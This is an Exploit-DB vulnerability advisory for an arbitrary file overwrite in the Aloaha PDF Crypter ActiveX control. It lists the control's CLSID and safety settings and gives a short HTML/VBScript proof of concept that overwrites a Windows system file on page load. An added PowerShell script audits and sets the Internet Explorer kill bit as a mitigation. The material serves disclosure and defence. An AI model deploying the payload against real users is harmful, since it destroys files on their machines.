Aloaha PDF Crypter (3.5.0.1164) - ActiveX Arbitrary File Overwrite

EDB-ID: 24319
CVE:
Author: shinnai
Type: dos
Platform: Windows
Published: 2013-01-24

============================================================================================
 TITLE:
============================================================================================
 Aloaha PDF Crypter (3.5.0.1164) activex arbitrary file overwrite

 url: http://www.aloaha.com/
 download: http://www.aloaha.com/download/aloaha_crypter.zip
 author: shinnai (http://shinnai.altervista.org)
============================================================================================
 FILE INFO:
============================================================================================
 File: C:\WINDOWS\system32\vbCrypt.dll
 InternalName: ebCrypt
 OriginalFilename: ebCrypt.DLL
 FileVersion: 2.0.0.2087
 FileDescription: ebCrypt Main Module
 Product: ebCrypt
 ProductVersion: 2.0.0.2087
 Language: English (United States)
 MD5 hash: b262cb93c555c3c9604502d071a783ec
============================================================================================
 ACTIVEX INFO:
============================================================================================
 ProgID: EbCrypt.eb_c_PRNGenerator.1
 GUID: {B1E7505E-BBFD-42BF-98C9-602205A1504C}
 Description: eb_c_PRNGenerator Class
 Safety report:
 RegKey Safe for Script: False
 RegKey Safe for Init: False
 Implements IObjectSafety: True
 IDisp Safe:  Safe for untrusted: caller,data
============================================================================================
 BUG:
============================================================================================
 This ActiveX control exposes the "SaveToFile" method, which can be used to overwrite
 arbitrary files on the user's PC.
============================================================================================
 PROOF OF CONCEPT
============================================================================================
 <html>
  <object classid='clsid:B1E7505E-BBFD-42BF-98C9-602205A1504C' id='test' ></object>
  <script language='vbscript'>
   test.SaveToFile "c:\windows\_system.ini"
  </script>
 </html>
============================================================================================
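
 Added example (not part of the original advisory or the vendor's code): a PowerShell check
 and mitigation that sets the Internet Explorer kill bit for the CLSID listed under ACTIVEX
 INFO, so the browser refuses to load the control even though it reports itself safe through
 IObjectSafety. The function names are hypothetical; writing the value requires an elevated
 prompt.

```powershell
# Added example, not the advisory author's code. Function names are hypothetical.
$Clsid   = '{B1E7505E-BBFD-42BF-98C9-602205A1504C}'  # GUID from the ACTIVEX INFO section
$KillBit = 0x400                                      # kill bit in "Compatibility Flags"

# On 64-bit Windows the 32-bit and 64-bit browsers read different registry views.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Get-KillBitState {
    param([Parameter(Mandatory)][string]$Clsid)
    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }   # view absent on this host
        $key   = Join-Path $root $Clsid
        $flags = 0
        if (Test-Path -LiteralPath $key) {
            $prop = Get-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' `
                        -ErrorAction SilentlyContinue
            if ($prop) { $flags = [int]$prop.'Compatibility Flags' }
        }
        [pscustomobject]@{
            Key    = $key
            Flags  = '0x{0:X}' -f $flags
            Killed = (($flags -band $KillBit) -ne 0)
        }
    }
}

function Set-KillBit {
    param([Parameter(Mandatory)][string]$Clsid)
    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        $key = Join-Path $root $Clsid
        if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
        $prop = Get-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' `
                    -ErrorAction SilentlyContinue
        $current = if ($prop) { [int]$prop.'Compatibility Flags' } else { 0 }
        # Preserve any flags already present and OR in the kill bit.
        New-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' `
            -PropertyType DWord -Value ($current -bor $KillBit) -Force | Out-Null
    }
}

Get-KillBitState -Clsid $Clsid      # audit: Killed = False means the control can still load
# Set-KillBit -Clsid $Clsid         # uncomment to apply, then re-run the audit line
```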